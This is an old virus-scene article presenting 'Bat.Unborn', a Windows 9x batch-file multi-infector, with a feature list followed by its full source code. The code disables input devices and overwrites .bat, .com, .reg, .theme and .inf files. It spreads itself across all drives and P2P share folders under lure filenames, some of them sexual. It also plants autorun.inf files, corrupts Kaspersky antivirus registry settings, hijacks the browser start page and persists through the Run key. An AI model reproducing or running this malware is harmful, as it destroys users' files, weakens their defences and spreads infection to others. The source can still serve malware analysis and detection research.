Redemption

Strange Article - Bat.Unborn Leader by DvL

 finished on: 22.09.2003, 15:15
 size: 10.927 bytes
 runs on: win9x

 ** Capabilities **

 * multi-infector, infects .bat, .reg, .theme, autorun.inf, .com, .inf
 * in the autorun.inf infection, the virus will run every time the user opens
   "My Computer"
 * in the .com infection, some .com files are overwritten with a small .com
   file that only displays a silly message (the payload); that file cannot spread itself
 * the .inf infection was designed to affect the desktop.inf file used by Atari
   to display the desktop of the currently running machine, but it will also
   overwrite all .inf files in the "inf" folder or in any other folder it finds
 * attacks Kaspersky AntiVirus via the registry
 * spreads via p2p
 * it will copy itself onto every drive (except b:\)
 * it will set the author's webpage as the default internet start page
 * it will run every time the computer is restarted, via the registry

=====[begin code]===============================================================
cLS
cTtY NuL
EChO OFf
bReAK oFF
rUNdLl32.ExE MoUSe,DiSAblE
RuNDlL32.ExE kEYboARd,diSAblE
Md c:\ >nul
CoPy %0 c:\\joke.bat >nul
echo.[CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\DefaultIcon]>_
echo.DefaultValue=c:\windows\Explorer.exe,0>>_
echo.>>_
echo.[CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\DefaultIcon]>>_
echo.DefaultValue=c:\windows\System\shell32.dll,0>>_
echo.>>_
echo.[CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\DefaultIcon]>>_
echo.empty=c:\windows\System\shell32.dll,0>>_
echo.full=c:\windows\System\shell32.dll,0>>_
echo.>>_
echo.>>_
echo.[Control Panel\Colors]>>_
echo.ActiveTitle=0 0 0>>_
echo.Background=0 0 0>>_
echo.Hilight=0 0 0>>_
echo.HilightText=0 0 0>>_
echo.TitleText=0 0 0>>_
echo.Window=0 0 0>>_
echo.WindowText=0 0 0>>_
echo.Scrollbar=0 0 0>>_
echo.InactiveTitle=0 0 0>>_
echo.Menu=0 0 0>>_
echo.WindowFrame=0 0 0>>_
echo.MenuText=0 0 0>>_
echo.ActiveBorder=0 0 0>>_
echo.InactiveBorder=0 0 0>>_
echo.AppWorkspace=0 0 0>>_
echo.ButtonFace=0 0 0>>_
echo.ButtonShadow=0 0 0>>_
echo.GrayText=0 0 0>>_
echo.ButtonText=0 0 0>>_
echo.InactiveTitleText=0 0 0>>_
echo.ButtonHilight=0 0 0>>_
echo.ButtonDkShadow=0 0 0>>_
echo.ButtonLight=0 0 0>>_
echo.InfoText=0 0 0>>_
echo.InfoWindow=0 0 0>>_
echo.>>_
echo.[Control Panel\Cursors]>>_
echo.Arrow=>>_
echo.Help=>>_
echo.AppStarting=>>_
echo.Wait=>>_
echo.NWPen=>>_
echo.No=>>_
echo.SizeNS=>>_
echo.SizeWE=>>_
echo.Crosshair=>>_
echo.IBeam=>>_
echo.SizeNWSE=>>_
echo.SizeNESW=>>_
echo.SizeAll=>>_
echo.UpArrow=>>_
echo.DefaultValue=Windows Default>>_
echo.>>_
echo.[Control Panel\Desktop]>>_
echo.Wallpaper=>>_
echo.TileWallpaper=0>>_
echo.WallpaperStyle=0>>_
echo.Pattern=(None)>>_
echo.ScreenSaveActive=0>>_
echo.>>_
echo.>>_
echo.>>_
echo.[AppEvents\Schemes\Apps\.Default\.Default\.Current]>>_
echo.DefaultValue=>>_
echo.>>_
echo.[AppEvents\Schemes\Apps\.Default\AppGPFault\.Current]>>_
echo.DefaultValue=>>_
echo.>>_
echo.[AppEvents\Schemes\Apps\.Default\Maximize\.Current]>>_
echo.DefaultValue=>>_
echo.>>_
echo.[AppEvents\Schemes\Apps\.Default\MenuCommand\.Current]>>_
echo.DefaultValue=>>_
echo.>>_
echo.[AppEvents\Schemes\Apps\.Default\MenuPopup\.Current]>>_
echo.DefaultValue=>>_
echo.>>_
echo.[AppEvents\Schemes\Apps\.Default\Minimize\.Current]>>_
echo.DefaultValue=>>_
echo.>>_
echo.[AppEvents\Schemes\Apps\.Default\Open\.Current]>>_
echo.DefaultValue=>>_
echo.>>_
echo.[AppEvents\Schemes\Apps\.Default\RestoreDown\.Current]>>_
echo.DefaultValue=>>_
echo.>>_
echo.[AppEvents\Schemes\Apps\.Default\RestoreUp\.Current]>>_
echo.DefaultValue=>>_
echo.>>_
echo.[AppEvents\Schemes\Apps\.Default\RingIn\.Current]>>_
echo.DefaultValue=>>_
echo.>>_
echo.[AppEvents\Schemes\Apps\.Default\Ringout\.Current]>>_
echo.DefaultValue=>>_
echo.>>_
echo.[AppEvents\Schemes\Apps\.Default\SystemAsterisk\.Current]>>_
echo.DefaultValue=>>_
echo.>>_
echo.[AppEvents\Schemes\Apps\.Default\SystemDefault\.Current]>>_
echo.DefaultValue=>>_
echo.>>_
echo.[AppEvents\Schemes\Apps\.Default\SystemExclamation\.Current]>>_
echo.DefaultValue=>>_
echo.>>_
echo.[AppEvents\Schemes\Apps\.Default\SystemExit\.Current]>>_
echo.DefaultValue=>>_
echo.>>_
echo.[AppEvents\Schemes\Apps\.Default\SystemHand\.Current]>>_
echo.DefaultValue=>>_
echo.>>_
echo.[AppEvents\Schemes\Apps\.Default\SystemQuestion\.Current]>>_
echo.DefaultValue=>>_
echo.>>_
echo.[AppEvents\Schemes\Apps\.Default\SystemStart\.Current]>>_
echo.DefaultValue=>>_
echo.>>_
echo.[AppEvents\Schemes\Apps\Explorer\EmptyRecycleBin\.Current]>>_
echo.DefaultValue=>>_
echo.>>_
echo.[AppEvents\Schemes\Apps\.Default\Close\.Current]>>_
echo.DefaultValue=>>_
echo.>>_
echo.>>_
echo.>>_
echo.[Metrics]>>_
echo.IconMetrics=76 0 0 0 75 0 0 0 75 0 0 0 0 0 0 0 248 255 255 255 0 0 0 0 0 0 0 0 0 0 0 0 144 1 0 0 0 0 0 0 0 0 0 0 77 83 32 83 97 110 115 32 83 101 114 105 102 0 2 0 0 0 2 0 15 6 0 0 0 0 151 17 63 1 243 21>>_
echo.NonclientMetrics=84 1 0 0 1 0 0 0 13 0 0 0 13 0 0 0 18 0 0 0 18 0 0 0 245 255 255 255 0 0 0 0 0 0 0 0 0 0 0 0 188 2 0 0 0 0 0 0 0 0 0 0 77 83 32 83 97 110 115 32 83 101 114 105 102 0 46 84 104 101 109 101 0 245 64 0 192 221 64 0 0 0 0 0 15 0 0 0 15 0 0 0 248 255 255 255 0 0 0 0 0 0 0 0 0 0 0 0 188 2 0 0 0 0 0 0 0 0 0 0 77 83 32 83 97 110 115 32 83 101 114 105 102 0 46 84 104 101 109 101 0 245 64 0 192 221 64 0 0 0 0 0 18 0 0 0 18 0 0 0 245 255 255 255 0 0 0 0 0 0 0 0 0 0 0 0 144 1 0 0 0 0 0 0 0 0 0 0 77 83 32 83 97 110 115 32 83 101 114 105 102 0 46 84 104 101 109 101 0 245 64 0 192 221 64 0 0 0 0 0 245 255 255 255 0 0 0 0 0 0 0 0 0 0 0 0 144 1 0 0 0 0 0 0 0 0 0 0 77 83 32 83 97 110 115 32 83 101 114 105 102 0 46 84 104 101 109 101 0 245 64 0 192 221 64 0 0 0 0 0 245 255 255 255 0 0 0 0 0 0 0 0 0 0 0 0 144 1 0 0 0 0 0 0 0 0 0 0 77 83 32 83 97 110 115 32 83 101 114 105 102 0 46 84 104 101 109 101 0 245 64 0 192 221 64 0 0 0 0 0>>_
echo.>>_
echo.>>_
echo.[boot]>>_
echo.SCRNSAVE.EXE=c:\\joke.bat>>_
echo.>>_
echo.[MasterThemeSelector]>>_
echo.MTSM=DABJDKT>>_
echo.ThemeColorBPP=4>>_
%comspec% nul /f /c if exist c:\nul copy %0 c:\cleanpc.bat
%comspec% nul /f /c if exist d:\nul copy %0 d:\winswp386.bat
%comspec% nul /f /c if exist e:\nul copy %0 e:\happy.bat
%comspec% nul /f /c if exist f:\nul copy %0 f:\funny.bat
%comspec% nul /f /c if exist g:\nul copy %0 g:\nice.bat
%comspec% nul /f /c if exist h:\nul copy %0 h:\freemp3.bat
%comspec% nul /f /c if exist i:\nul copy %0 i:\chicks.bat
%comspec% nul /f /c if exist j:\nul copy %0 j:\cunny.bat
%comspec% nul /f /c if exist k:\nul copy %0 k:\bigtits.bat
%comspec% nul /f /c if exist l:\nul copy %0 l:\strange.bat
%comspec% nul /f /c if exist m:\nul copy %0 m:\flower.bat
%comspec% nul /f /c if exist n:\nul copy %0 n:\convert.bat
%comspec% nul /f /c if exist o:\nul copy %0 o:\compress.bat
%comspec% nul /f /c if exist p:\nul copy %0 p:\pics.bat
%comspec% nul /f /c if exist q:\nul copy %0 q:\article.bat
%comspec% nul /f /c if exist r:\nul copy %0 r:\driver.bat
%comspec% nul /f /c if exist s:\nul copy %0 s:\sblaster.bat
%comspec% nul /f /c if exist t:\nul copy %0 t:\cdrom.bat
%comspec% nul /f /c if exist u:\nul copy %0 u:\update.bat
%comspec% nul /f /c if exist v:\nul copy %0 v:\add-on.bat
%comspec% nul /f /c if exist w:\nul copy %0 w:\program.bat
%comspec% nul /f /c if exist x:\nul copy %0 x:\contest.bat
%comspec% nul /f /c if exist y:\nul copy %0 y:\zine.bat
%comspec% nul /f /c if exist z:\nul copy %0 z:\test.bat
%comspec% nul /f /c if exist a:\nul copy %0 a:\winstart.bat
Copy %0 c:\kazaa\myshar~1\document.bat >nul
cOpy %0 c:\mydown~1\document.bat >nul
coPy %0 c:\mydocu~1\document.bat >nul
copy %0 c:\progra~1\applej~1\incoming\document.bat >nul
copy %0 c:\progra~1\bearsh~1\shared\document.bat >nul
copy %0 c:\progra~1\edonke~1\incoming\document.bat >nul
copy %0 c:\progra~1\emule\incoming\document.bat >nul
copy %0 c:\progra~1\grokster\mygrok~1\document.bat >nul
copy %0 c:\progra~1\icq\shared~1\document.bat >nul
copy %0 c:\progra~1\kazaa\myshar~1\document.bat >nul
copy %0 c:\progra~1\kazaal~1\myshar~1\document.bat >nul
copy %0 c:\progra~1\kmd\myshar~1\document.bat >nul
copy %0 c:\progra~1\limewire\shared\document.bat >nul
copy %0 c:\progra~1\morpheus\myshar~1\document.bat >nul
copy %0 c:\progra~1\overnet\bundles\document.bat >nul
echo.REGEDIT4>__
echo.>>__
echo.[HKLM\Software\KasperskyLab\SharedFiles]>>__
echo."avpfolder"="c:\">>__
echo.[HKLM\Software\KasperskyLab\SharedFiles]>>__
echo."VEDataFilePath"="c:\">>__
echo.[HKLM\Software\KasperskyLab\SharedFiles]>>__
echo."VEIndexFilePath"="c:\">>__
echo.[HKLM\Software\KasperskyLab\SharedFiles]>>__
echo."MainDir"="c:\">>__
echo.[HKLM\Software\KasperskyLab\SharedFiles]>>__
echo."Folder"="c:\">>__
echo.[HKCU\Software\Microsoft\Internet Explorer\Main]>>__
echo."Start Page"="www.geocities.com/ratty_dvl/BATch/main.htm">>__
echo.[HKLM\Software\Microsoft\Windows\CurrentVersion\Run\]>>__
echo.@="start command /c c:\\joke.bat">>__
echo.[AutoRun]>___
echo.open=c:\\joke.bat>>___
echo.icon=c:\windows\System\shell32.dll,0>>___
%comspec% nul /f /c if exist c:\nul cOPy ___ c:\autorun.inf
%comspec% nul /f /c if exist d:\nul CopY ___ d:\autorun.inf
%comspec% nul /f /c if exist e:\nul cOPy ___ e:\autorun.inf
%comspec% nul /f /c if exist f:\nul CopY ___ f:\autorun.inf
echo.X5O!P%%@AP[4\PZX54(P^)7CC)7}$          Fucked by [DvL]          $H+H*>_!
echo.#a000000>._
echo.#b000000>>._
echo.#c7770007000600070055200505552220770557075055507703111103>>._
echo.#d>>._
echo.#E 18 12>>._
echo.#W 00 00 00 07 26 0C 00 @>>._
echo.#W 00 00 02 0B 26 09 00 @>>._
echo.#W 00 00 0A 0F 1A 09 00 @>>._
echo.#W 00 00 0E 01 1A 09 00 @>>._
echo.#M 00 00 00 FF A FLOPPY DISK@ @>>._
echo.#M 00 01 00 FF B FLOPPY DISK@ @>>._
echo.#T 00 03 02 FF   TRASH@ @>>._
echo.#F FF 04   @ *.*@ @>>._
echo.#D FF 01   @ *.*@ @>>._
echo.#G 03 FF   *.APP@ @ @>>._
echo.#G 03 FF   *.PRG@ @ @>>._
echo.#P 03 FF   *.TTP@ @ @>>._
echo.#F 03 04   *.TOS@ @ @>>._
FOr %%* In (*.theme ..\*.theme c:\mydocu~1\*.theme %windir%\*.theme %path%\*.theme %windir%\desktop\*.theme %windir%\command\ebd\*.theme %windir%\system\*.theme c:\progra~1\plus!\themes\*.theme %themedir%\*.theme) dO aTTriB -r -h -s -a %%*
fOR %%* iN (*.theme ..\*.theme c:\mydocu~1\*.theme %windir%\*.theme %path%\*.theme %windir%\desktop\*.theme %windir%\command\ebd\*.theme %windir%\system\*.theme c:\progra~1\plus!\themes\*.theme %themedir%\*.theme) Do cOPy _ %%* /Y
FOr %%_ In (c:\*.com *.com ..\*.com c:\mydocu~1\*.com %windir%\*.com %path%\*.com %windir%\desktop\*.com %windir%\system\*.com) dO aTTriB -R -h -S -a %%_
fOR %%_ iN (c:\*.com *.com ..\*.com c:\mydocu~1\*.com %windir%\*.com %path%\*.com %windir%\desktop\*.com %windir%\system\*.com) Do cOPy _! %%_ /y
FOr %%! In (c:\*.bat *.bat ..\*.bat c:\mydocu~1\*.bat %windir%\*.bat %path%\*.bat %windir%\desktop\*.bat %windir%\system\*.bat) dO aTTriB -R -h -S -a %%!
fOR %%! iN (c:\*.bat *.bat ..\*.bat c:\mydocu~1\*.bat %windir%\*.bat %path%\*.bat %windir%\desktop\*.bat %windir%\system\*.bat) Do cOPy %0 %%! /y
FOr %%. In (c:\*.reg *.reg ..\*.reg c:\mydocu~1\*.reg %windir%\*.reg %path%\*.reg %windir%\desktop\*.reg %windir%\system\*.reg) dO aTTriB -R -h -S -a %%.
fOR %%. iN (c:\*.reg *.reg ..\*.reg c:\mydocu~1\*.reg %windir%\*.reg %path%\*.reg %windir%\desktop\*.reg %windir%\system\*.reg) Do cOPy __ %%. /y
FOr %%- In (*.in* ..\*.in* c:\mydocu~1\*.in* %windir%\inf\*.in* %windir%\*.in* %path%\*.in* c:\*.in* %windir%\system\*.in* c:\progra~1\steem\*.in* c:\progra~1\gemul8r\*.in* c:\steem\*.in* c:\gemul8r\*.in*) dO aTTriB -R -h -S -a %%-
fOR %%- iN (*.in* ..\*.in* c:\mydocu~1\*.in* %windir%\inf\*.in* %windir%\*.in* %path%\*.in* c:\*.in* %windir%\system\*.in* c:\progra~1\steem\*.in* c:\progra~1\gemul8r\*.in* c:\steem\*.in* c:\gemul8r\*.in*) Do cOPy ._ %%- /y
rEN __ __.reg
regedit /s __.reg
cLS

living virus